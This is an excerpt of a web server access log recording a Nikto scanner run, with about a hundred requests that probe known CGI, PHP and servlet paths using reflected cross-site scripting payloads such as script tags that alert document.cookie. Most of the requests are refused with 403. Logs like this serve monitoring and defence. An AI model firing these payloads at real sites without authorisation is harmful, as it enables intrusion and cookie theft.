  1177. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /administrator/gallery/view.php?path=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000709)"
  1178. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /administrator/gallery/uploadimage.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000710)"
  1179. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /administrator/gallery/navigation.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000711)"
  1180. 84.56.69.222 - - [23/Oct/2013:15:38:52 +0400] "GET /administrator/gallery/gallery.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000712)"
  1181. 84.56.69.222 - - [23/Oct/2013:15:38:55 +0400] "GET /index.php?dir=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000713)"
  1182. 84.56.69.222 - - [23/Oct/2013:15:38:56 +0400] "GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000714)"
  1183. 84.56.69.222 - - [23/Oct/2013:15:38:56 +0400] "GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000715)"
  1184. 84.56.69.222 - - [23/Oct/2013:15:39:13 +0400] "GET /article.cfm?id=1'<script>alert(document.cookie);</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000716)"
  1185. 84.56.69.222 - - [23/Oct/2013:15:39:14 +0400] "GET /upload.php?type=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000717)"
  1186. 84.56.69.222 - - [23/Oct/2013:15:39:14 +0400] "GET /soinfo.php?\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000718)"
  1187. 84.56.69.222 - - [23/Oct/2013:15:39:21 +0400] "GET /modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000719)"
  1188. 84.56.69.222 - - [23/Oct/2013:15:39:21 +0400] "GET /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000720)"
  1189. 84.56.69.222 - - [23/Oct/2013:15:39:21 +0400] "GET /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000721)"
  1190. 84.56.69.222 - - [23/Oct/2013:15:39:21 +0400] "GET /webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000722)"
  1191. 84.56.69.222 - - [23/Oct/2013:15:39:22 +0400] "GET /addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000723)"
  1192. 84.56.69.222 - - [23/Oct/2013:15:39:24 +0400] "GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000724)"
  1193. 84.56.69.222 - - [23/Oct/2013:15:39:25 +0400] "GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000725)"
  1194. 84.56.69.222 - - [23/Oct/2013:15:39:25 +0400] "GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000726)"
  1195. 84.56.69.222 - - [23/Oct/2013:15:39:25 +0400] "GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000727)"
  1196. 84.56.69.222 - - [23/Oct/2013:15:39:26 +0400] "GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000728)"
  1197. 84.56.69.222 - - [23/Oct/2013:15:39:26 +0400] "GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000729)"
  1198. 84.56.69.222 - - [23/Oct/2013:15:39:26 +0400] "GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000730)"
  1199. 84.56.69.222 - - [23/Oct/2013:15:39:26 +0400] "GET /<script>alert('Vulnerable')</script>.shtm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000731)"
  1200. 84.56.69.222 - - [23/Oct/2013:15:39:26 +0400] "GET /<script>alert('Vulnerable')</script>.stm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000732)"
  1201. 84.56.69.222 - - [23/Oct/2013:15:39:26 +0400] "GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\\"><script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000733)"
  1202. 84.56.69.222 - - [23/Oct/2013:15:39:27 +0400] "GET /SiteServer/Knowledge/Default.asp?ctr=\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000734)"
  1203. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /_mem_bin/formslogin.asp?\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000735)"
  1204. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /nosuchurl/><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000736)"
  1205. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000737)"
  1206. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000738)"
  1207. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /webcgi/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000739)"
  1208. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /scripts/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000739)"
  1209. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000740)"
  1210. 84.56.69.222 - - [23/Oct/2013:15:39:28 +0400] "GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000741)"
  1211. 84.56.69.222 - - [23/Oct/2013:15:39:29 +0400] "GET /webcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000742)"
  1212. 84.56.69.222 - - [23/Oct/2013:15:39:29 +0400] "GET /scripts/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000742)"
  1213. 84.56.69.222 - - [23/Oct/2013:15:39:29 +0400] "GET /webcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000743)"
  1214. 84.56.69.222 - - [23/Oct/2013:15:39:29 +0400] "GET /scripts/vq/demos/respond.pl?<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000743)"
  1215. 84.56.69.222 - - [23/Oct/2013:15:39:29 +0400] "GET /webcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000744)"
  1216. 84.56.69.222 - - [23/Oct/2013:15:39:29 +0400] "GET /scripts/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000744)"
  1217. 84.56.69.222 - - [23/Oct/2013:15:39:30 +0400] "GET /webcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000745)"
  1218. 84.56.69.222 - - [23/Oct/2013:15:39:30 +0400] "GET /scripts/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000745)"
  1219. 84.56.69.222 - - [23/Oct/2013:15:39:30 +0400] "GET /webcgi/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000746)"
  1220. 84.56.69.222 - - [23/Oct/2013:15:39:30 +0400] "GET /scripts/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000746)"
  1221. 84.56.69.222 - - [23/Oct/2013:15:39:30 +0400] "GET /webcgi/test-cgi.exe?<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000747)"
  1222. 84.56.69.222 - - [23/Oct/2013:15:39:31 +0400] "GET /scripts/test-cgi.exe?<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000747)"
  1223. 84.56.69.222 - - [23/Oct/2013:15:39:31 +0400] "GET /webcgi/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000748)"
  1224. 84.56.69.222 - - [23/Oct/2013:15:39:31 +0400] "GET /scripts/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000748)"
  1225. 84.56.69.222 - - [23/Oct/2013:15:39:31 +0400] "GET /webcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000749)"
  1226. 84.56.69.222 - - [23/Oct/2013:15:39:43 +0400] "GET /scripts/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000749)"
  1227. 84.56.69.222 - - [23/Oct/2013:15:40:00 +0400] "GET /webcgi/search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000750)"
  1228. 84.56.69.222 - - [23/Oct/2013:15:40:01 +0400] "GET /scripts/search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000750)"
  1229. 84.56.69.222 - - [23/Oct/2013:15:40:01 +0400] "GET /webcgi/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000751)"
  1230. 84.56.69.222 - - [23/Oct/2013:15:40:01 +0400] "GET /scripts/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000751)"
  1231. 84.56.69.222 - - [23/Oct/2013:15:40:01 +0400] "GET /webcgi/pbcgi.cgi?Nikto=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000751)"
  1232. 84.56.69.222 - - [23/Oct/2013:15:40:01 +0400] "GET /scripts/pbcgi.cgi?Nikto=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000751)"
  1233. 84.56.69.222 - - [23/Oct/2013:15:40:01 +0400] "GET /webcgi/myguestbook.cgi?action=view HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000752)"
  1234. 84.56.69.222 - - [23/Oct/2013:15:40:02 +0400] "GET /scripts/myguestbook.cgi?action=view HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000752)"
  1235. 84.56.69.222 - - [23/Oct/2013:15:40:02 +0400] "GET /webcgi/login.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000753)"
  1236. 84.56.69.222 - - [23/Oct/2013:15:40:02 +0400] "GET /scripts/login.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000753)"
  1237. 84.56.69.222 - - [23/Oct/2013:15:40:02 +0400] "GET /webcgi/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000754)"
  1238. 84.56.69.222 - - [23/Oct/2013:15:40:02 +0400] "GET /scripts/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000754)"
  1239. 84.56.69.222 - - [23/Oct/2013:15:40:06 +0400] "GET /webcgi/FormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000755)"
  1240. 84.56.69.222 - - [23/Oct/2013:15:40:06 +0400] "GET /scripts/FormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000755)"
  1241. 84.56.69.222 - - [23/Oct/2013:15:40:06 +0400] "GET /webcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000756)"
  1242. 84.56.69.222 - - [23/Oct/2013:15:40:10 +0400] "GET /scripts/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000756)"
  1243. 84.56.69.222 - - [23/Oct/2013:15:40:29 +0400] "GET /webcgi/fom.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000757)"
  1244. 84.56.69.222 - - [23/Oct/2013:15:40:30 +0400] "GET /scripts/fom.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000757)"
  1245. 84.56.69.222 - - [23/Oct/2013:15:40:30 +0400] "GET /webcgi/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000758)"
  1246. 84.56.69.222 - - [23/Oct/2013:15:40:40 +0400] "GET /scripts/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000758)"
  1247. 84.56.69.222 - - [23/Oct/2013:15:40:40 +0400] "GET /webcgi/diagnose.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000759)"
  1248. 84.56.69.222 - - [23/Oct/2013:15:40:40 +0400] "GET /scripts/diagnose.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000759)"
  1249. 84.56.69.222 - - [23/Oct/2013:15:40:41 +0400] "GET /webcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000760)"
  1250. 84.56.69.222 - - [23/Oct/2013:15:40:42 +0400] "GET /scripts/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000760)"
  1251. 84.56.69.222 - - [23/Oct/2013:15:40:42 +0400] "GET /webcgi/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000761)"
  1252. 84.56.69.222 - - [23/Oct/2013:15:40:42 +0400] "GET /scripts/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000761)"
  1253. 84.56.69.222 - - [23/Oct/2013:15:40:43 +0400] "GET /webcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000762)"
  1254. 84.56.69.222 - - [23/Oct/2013:15:40:43 +0400] "GET /scripts/betsie/parserl.pl/<script>alert('Vulnerable')</script>; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000762)"
  1255. 84.56.69.222 - - [23/Oct/2013:15:40:43 +0400] "GET /webcgi/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000763)"
  1256. 84.56.69.222 - - [23/Oct/2013:15:40:43 +0400] "GET /scripts/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000763)"
  1257. 84.56.69.222 - - [23/Oct/2013:15:40:44 +0400] "GET /webcgi/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000764)"
  1258. 84.56.69.222 - - [23/Oct/2013:15:40:44 +0400] "GET /scripts/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000764)"
  1259. 84.56.69.222 - - [23/Oct/2013:15:40:45 +0400] "GET /webcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000765)"
  1260. 84.56.69.222 - - [23/Oct/2013:15:40:45 +0400] "GET /scripts/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000765)"
  1261. 84.56.69.222 - - [23/Oct/2013:15:40:45 +0400] "GET /webcgi/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000766)"
  1262. 84.56.69.222 - - [23/Oct/2013:15:40:45 +0400] "GET /scripts/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000766)"
  1263. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000767)"
  1264. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /~/<script>alert('Vulnerable')</script>.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000768)"
  1265. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /~/<script>alert('Vulnerable')</script>.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000769)"
  1266. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825& HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000770)"
  1267. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /catinfo?<u><b>TESTING HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000771)"
  1268. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000772)"
  1269. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /webamil/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000773)"
  1270. 84.56.69.222 - - [23/Oct/2013:15:40:46 +0400] "GET /users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000774)"
  1271. 84.56.69.222 - - [23/Oct/2013:15:40:47 +0400] "GET /usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000775)"
  1272. 84.56.69.222 - - [23/Oct/2013:15:40:47 +0400] "GET /user.php?op=userinfo&uname=<script>alert('hi');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000776)"
  1273. 84.56.69.222 - - [23/Oct/2013:15:40:47 +0400] "GET /TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000779)"
  1274. 84.56.69.222 - - [23/Oct/2013:15:40:48 +0400] "GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000780)"
  1275. 84.56.69.222 - - [23/Oct/2013:15:40:48 +0400] "GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000781)"
  1276. 84.56.69.222 - - [23/Oct/2013:15:40:49 +0400] "GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000782)"
  1277. 84.56.69.222 - - [23/Oct/2013:15:40:49 +0400] "GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000783)"
  1278. 84.56.69.222 - - [23/Oct/2013:15:40:52 +0400] "GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000784)"
  1279. 84.56.69.222 - - [23/Oct/2013:15:40:52 +0400] "GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000785)"
  1280. 84.56.69.222 - - [23/Oct/2013:15:40:53 +0400] "GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000786)"
  1281. 84.56.69.222 - - [23/Oct/2013:15:40:53 +0400] "GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000787)"
  1282. 84.56.69.222 - - [23/Oct/2013:15:40:54 +0400] "GET /showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000788)"
  1283. 84.56.69.222 - - [23/Oct/2013:15:40:54 +0400] "GET /shop/normal_html.cgi?file=&lt;script&gt;alert(\\\"Vulnerable\\\")&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000789)"
  1284. 84.56.69.222 - - [23/Oct/2013:15:40:54 +0400] "GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000790)"
